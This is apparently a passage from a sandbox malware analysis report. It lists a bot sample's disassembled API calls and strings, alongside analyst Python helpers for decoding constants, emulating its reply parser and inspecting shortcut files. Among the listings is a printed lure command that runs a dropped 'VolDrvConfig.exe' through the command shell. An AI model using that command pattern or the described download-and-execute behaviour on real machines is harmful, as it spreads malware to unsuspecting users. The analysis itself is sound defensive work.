                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                              • String ID:
                                              • API String ID: 3862671961-0
                                              • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction ID: d6bd3df3806ede59070add2f0d7a1f8bc277f5a62d9d5dceae4a540d753efef8
                                              • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction Fuzzy Hash: 80413CB4E00209EBDB14DFE4D848BAEBB75EF44305F10C16AE911A7390D7789A85CF59
                                              APIs
                                              • memset.NTDLL ref: 0040EF1E
                                              • memset.NTDLL ref: 0040EF2E
                                              • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EF67
                                              • Sleep.KERNEL32(000003E8), ref: 0040EF77
                                              • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EF92
                                              • Sleep.KERNEL32(000003E8), ref: 0040EFAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction ID: 2af3465f2ac7e3bdaf7f942b51208d096d5e25dcc258d3f6adac25a8060dddc3
                                              • Opcode Fuzzy Hash: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction Fuzzy Hash: 6F114F71A84308BBEB10DB90DD46FDE7778AB14B00F204125FA09BE2C1D7F56A44C75A
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                              • setsockopt.WS2_32 ref: 00401F2C
                                              • closesocket.WS2_32(?), ref: 00401F39
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                              • String ID:
                                              • API String ID: 671207744-0
                                              • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction ID: 8c1e587a25cfc232de2ab0883eb36e20e47ed0b1207a5ae34e006e610dd4584e
                                              • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction Fuzzy Hash: F2519F75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                              APIs
                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                              • Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleeprecvfrom
                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                              • API String ID: 668330359-3973262388
                                              • Opcode ID: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction ID: cf4c7c589cb5a2b5626e628c2cbe2bc4730fcdb76fc9a6090f7a4287b0899cde
                                              • Opcode Fuzzy Hash: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction Fuzzy Hash: C92142B0944218ABDB20CB64DC49BE97774AB14308F1085E9E7197B2C0D7B99ACACF5C
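The call chain above (recvfrom of at most 0x400 bytes, StrCmpNIA against "HTTP/1.1 200 OK" for 0x0F characters, StrStrIA for "LOCATION: ", StrChrA for 0x0D) is the sample's hand-rolled reply parser. The Python below replays that logic over constructed replies so the acceptance conditions can be checked offline. It is an added example, not code from the report or from the sample; the treatment of a missing CR is an assumption, since the listing does not show what the function does when StrChrA returns NULL.

```python
from typing import Optional

# Constants lifted from the API listing: recvfrom() reads at most 0x400 bytes,
# StrCmpNIA compares 0x0F (15) characters, StrChrA searches for 0x0D ('\r').
RECV_BUFFER_SIZE = 0x400
STATUS_PREFIX = b"HTTP/1.1 200 OK"      # exactly 15 bytes
LOCATION_TOKEN = b"LOCATION: "          # StrStrIA: case-insensitive substring
CR = b"\r"


def extract_location(raw_response: bytes) -> Optional[str]:
    """Replay the bot's reply check and return the value it would extract.

    Returns None wherever the original call chain fails: the reply is not a
    "200 OK", there is no Location header, or the header is not CR-terminated.
    """
    # recvfrom(s, buf, 0x400, ...): bytes beyond 1024 are never examined.
    buf = raw_response[:RECV_BUFFER_SIZE]

    # StrCmpNIA(buf, "HTTP/1.1 200 OK", 15) == 0: case-insensitive prefix match,
    # so "http/1.1 200 ok" is accepted but "HTTP/1.1 302 Found" is not.
    if buf[:len(STATUS_PREFIX)].lower() != STATUS_PREFIX.lower():
        return None

    # StrStrIA(buf, "LOCATION: "): first case-insensitive hit anywhere in the
    # 1024 bytes, headers or body; the code does not walk the header block.
    idx = buf.lower().find(LOCATION_TOKEN.lower())
    if idx < 0:
        return None
    start = idx + len(LOCATION_TOKEN)

    # StrChrA(value, '\r'): the value runs up to the first CR. Assumption, not
    # shown in the listing: a missing CR (StrChrA returning NULL) aborts.
    end = buf.find(CR, start)
    if end < 0:
        return None
    return buf[start:end].decode("latin-1")


# Constructed replies for illustration, not traffic captured in the analysis.
SAMPLE_OK = (b"HTTP/1.1 200 OK\r\nServer: nginx\r\n"
             b"Location: http://example.invalid/next.exe\r\n\r\n")
SAMPLE_REDIRECT = b"HTTP/1.1 302 Found\r\nLocation: http://example.invalid/next.exe\r\n\r\n"
SAMPLE_LF_ONLY = b"HTTP/1.1 200 OK\nLocation: http://example.invalid/next.exe\n\n"
```

Two properties matter for anyone writing an emulator or sinkhole for this code path: the status check demands a 200 OK rather than a 3xx, so the Location header has to be served on a success reply, and the substring search is not anchored to the header block, so a "Location: " token within the first 1024 bytes of a body would be taken just the same.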
                                              APIs
                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EFD7
                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EFF6
                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F01F
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F048
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F052
                                              • Sleep.KERNEL32(000003E8), ref: 0040F05D
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EFD2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 2743515581-2272513262
                                              • Opcode ID: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction ID: b5bc459e60af10a5ecd3bce89b92fe6334010ad2bd78cd38f87cd536e4e3c5ce
                                              • Opcode Fuzzy Hash: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction Fuzzy Hash: 6821FC74A40208FBDB20DF94CC49FDEB775AB44705F1085A5FA11AB2C1C7B96A44CB59
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00417F40,?,?,?,?,?,?,00407FE3), ref: 0040B85B
                                              • CreateFileW.KERNEL32(00417D28,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B8AD
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B8CE
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B8ED
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B902
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B968
                                              • CloseHandle.KERNEL32(00000000), ref: 0040B972
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B97C
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                              • String ID:
                                              • API String ID: 439099756-0
                                              • Opcode ID: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction ID: 20bf7a335d7b83d19979346108b4db2f5a5138f5ba8950715db26485b9768e75
                                              • Opcode Fuzzy Hash: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction Fuzzy Hash: 84413AB4E40308ABDB10DFA4CC4AFAEB774EB04704F208569E611BA2D1C7B96641CB9D
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(004174D8,?,?,?,?,?,00407FAD), ref: 00405B6B
                                              • CreateFileW.KERNEL32(00417708,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407FAD), ref: 00405B85
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                              • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                              • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                              • String ID:
                                              • API String ID: 3956458805-0
                                              • Opcode ID: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction ID: 3caee3762cbdbcce4f49fb41099d7db393733e6e5b5fc44a0020794708857aa0
                                              • Opcode Fuzzy Hash: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction Fuzzy Hash: 51313D74A40308EBEB10DBA4CC4ABAFB774EB44704F208569E601772D0D7B96A81CF99
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,00000000,0040BE82,006A0266,?,0040BE9E,00000000,0040D17C,?), ref: 0040600F
                                              • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                              • CreateFileW.KERNEL32(00417708,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                              • LeaveCriticalSection.KERNEL32(004174D8,?,?,?,?,?,?,0040BE9E,00000000,0040D17C,?), ref: 00406248
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                              • String ID:
                                              • API String ID: 1457358591-0
                                              • Opcode ID: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction ID: d2a8f2c597d4f808d2c136561af7b6c80c21d69a530c7dbbc8373d1e9f004416
                                              • Opcode Fuzzy Hash: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction Fuzzy Hash: 6071E0B4E042099BCB04CF98D981FEFBBB1BB48304F14816DE505BB382D779A951CBA5
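The listings print every argument as raw hex, so CreateFileW(…,40000000,…,00000002,00000002,…) above or HttpQueryInfoA(…,20000005,…) earlier on this page has to be decoded by hand before it is obvious that the sample writes a hidden file with CREATE_ALWAYS, or asks WinINet for a numeric Content-Length. The Python below parses bullets in exactly this listing format and names the documented SDK constants for the calls shown on this page. It is an added analyst helper, not part of Joe Sandbox or of the sample, and its constant tables only cover the APIs listed here; string arguments that contain commas (the User-Agent passed to InternetOpenA) are split naively and left undecoded.

```python
import re
from typing import Dict, Optional

# One "APIs" bullet of this listing, e.g.
#   • CreateFileW.KERNEL32(00417708,40000000,...), ref: 004061C5
#   • wsprintfW.USER32 ref: 00406456
#   • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented SDK values for the positional arguments worth decoding:
# api -> {0-based arg index -> {value: name}}.
ARG_TABLES: Dict[str, Dict[int, Dict[int, str]]] = {
    "CreateFileW": {
        1: {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
            0xC0000000: "GENERIC_READ|GENERIC_WRITE"},
        4: {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
        5: {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL"},
    },
    "CreateFileMappingW": {2: {2: "PAGE_READONLY", 4: "PAGE_READWRITE"}},
    "MapViewOfFile": {1: {2: "FILE_MAP_WRITE", 4: "FILE_MAP_READ",
                          0xF001F: "FILE_MAP_ALL_ACCESS"}},
    "RegOpenKeyExW": {0: {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"},
                      3: {0x20019: "KEY_READ", 0xF003F: "KEY_ALL_ACCESS"}},
    "CoCreateInstance": {2: {1: "CLSCTX_INPROC_SERVER", 4: "CLSCTX_LOCAL_SERVER"}},
}

# HttpQueryInfo's dwInfoLevel is a query level OR'ed with modifier flags.
HTTP_QUERY_FLAGS = {0x80000000: "HTTP_QUERY_FLAG_REQUEST_HEADERS",
                    0x40000000: "HTTP_QUERY_FLAG_SYSTEMTIME",
                    0x20000000: "HTTP_QUERY_FLAG_NUMBER",
                    0x10000000: "HTTP_QUERY_FLAG_COALESCE"}
HTTP_QUERY_LEVELS = {1: "HTTP_QUERY_CONTENT_TYPE", 5: "HTTP_QUERY_CONTENT_LENGTH",
                     19: "HTTP_QUERY_STATUS_CODE", 21: "HTTP_QUERY_RAW_HEADERS",
                     22: "HTTP_QUERY_RAW_HEADERS_CRLF"}


def parse_api_line(line: str) -> Optional[Dict]:
    """Split one listing bullet into api, module, raw argument list and ref address."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {"api": m.group("api"), "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args is not None else [],
            "ref": int(m.group("ref"), 16)}


def as_number(arg: str) -> Optional[int]:
    """Listing arguments are bare hex; '?' and string literals yield None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_http_query_level(level: int) -> str:
    flags = [name for bit, name in HTTP_QUERY_FLAGS.items() if level & bit]
    base = level & 0x0FFFFFFF
    return "|".join(flags + [HTTP_QUERY_LEVELS.get(base, "level_%d" % base)])


def annotate(line: str) -> Optional[str]:
    """Render a listing bullet with its numeric arguments named."""
    rec = parse_api_line(line)
    if rec is None:
        return None
    api, args, notes = rec["api"], rec["args"], []
    if api == "HttpQueryInfoA" and len(args) > 1 and as_number(args[1]) is not None:
        notes.append("dwInfoLevel=" + decode_http_query_level(as_number(args[1])))
    elif api == "Sleep" and args and as_number(args[0]) is not None:
        notes.append("dwMilliseconds=%d" % as_number(args[0]))
    for idx, table in ARG_TABLES.get(api, {}).items():
        value = as_number(args[idx]) if idx < len(args) else None
        if value is not None and value in table:
            notes.append("arg%d=%s" % (idx, table[value]))
    return "%s.%s @ %08X: %s" % (api, rec["module"], rec["ref"],
                                  ", ".join(notes) or "no decoded arguments")
```

Run over the bullets of the write function above, the helper reports GENERIC_WRITE, CREATE_ALWAYS and FILE_ATTRIBUTE_HIDDEN for the CreateFileW call, which together with the 0x100-byte memcpy and FlushFileBuffers reads as "overwrite a small hidden file and force it to disk". The read-side functions decode to GENERIC_READ, OPEN_EXISTING, PAGE_READONLY and FILE_MAP_READ.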
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction ID: 498a00270a4ac3f3e732f182914c0c13a71c1caacf2de73c52121c1bdff13e9d
                                              • Opcode Fuzzy Hash: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction Fuzzy Hash: D5412E74A0020AEFDB04DF95C884FAFB7B9BF48304F108969E515A7390D778AE85CB95
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction ID: f37cc5fa491f806f20af1ba12fe7b13e6bb3fdd54c67fa744f8c06207b50935d
                                              • Opcode Fuzzy Hash: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction Fuzzy Hash: D1412DB5A0020ADFCB14DF99C884BAFB7B9BF48304F108569E515B7390D778AE85CB94
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 5e75d3bdf23019904cb63c7272498dca16bbf89365b4ea4552ce7bb9462c7b35
                                              • Instruction ID: 6ff3262b9ae864165baf17eb68ae52fc582ecffe48c2a7281556c95dbf3b24cf
                                              • Opcode Fuzzy Hash: 5e75d3bdf23019904cb63c7272498dca16bbf89365b4ea4552ce7bb9462c7b35
                                              • Instruction Fuzzy Hash: 8C31E172200215ABC710AFB5ED8CAD7B7A8FF54324F00463EF55AD3280DB79A8448B99
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040640B
                                              • CoCreateInstance.OLE32(00412A48,00000000,00000001,00412A28,?), ref: 00406423
                                              • wsprintfW.USER32 ref: 00406456
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInitializeInstancewsprintf
                                              • String ID: %comspec%$/c start %s & start %s\VolDrvConfig.exe$Gh@
                                              • API String ID: 2038452267-1238916929
                                              • Opcode ID: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction ID: 7d2455aabe9eb384640674d95cb3f7402ea72c7f03b095a020dcafb7bbec31f6
                                              • Opcode Fuzzy Hash: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction Fuzzy Hash: 8E31C975A40208EFCB04DF98D885EDEB7B5EF88704F108199F519A73A5CA74AE81CB54
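The function above formats "%comspec%" and "/c start %s & start %s\VolDrvConfig.exe" right after CoCreateInstance, which is the shape of a removable-drive lure: a shortcut that opens the real folder and the dropped executable in one command. Assumption, since the CLSID at 00412A48 is not resolved in the listing: the COM object is a shell link and the two strings become the link target and its arguments. The Python below, an added example rather than code from the report or from the sample, parses the StringData of a .lnk per MS-SHLLINK and flags that argument pattern. The sample shortcut it builds, including the folder name, is constructed for the test and was not recovered from the analysis.

```python
import re
import struct
from typing import Dict

# Shell link header (MS-SHLLINK 2.1): fixed 0x4C bytes, fixed LinkCLSID
# {00021401-0000-0000-C000-000000000046} in on-disk byte order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that change the layout of what follows the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order, each gated by its flag.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk_strings(data: bytes) -> Dict[str, str]:
    """Return the StringData fields of a .lnk.

    The LinkTargetIDList and LinkInfo blocks are skipped, not resolved, so a
    link whose only target lives in the IDList yields no relative_path.
    """
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields: Dict[str, str] = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
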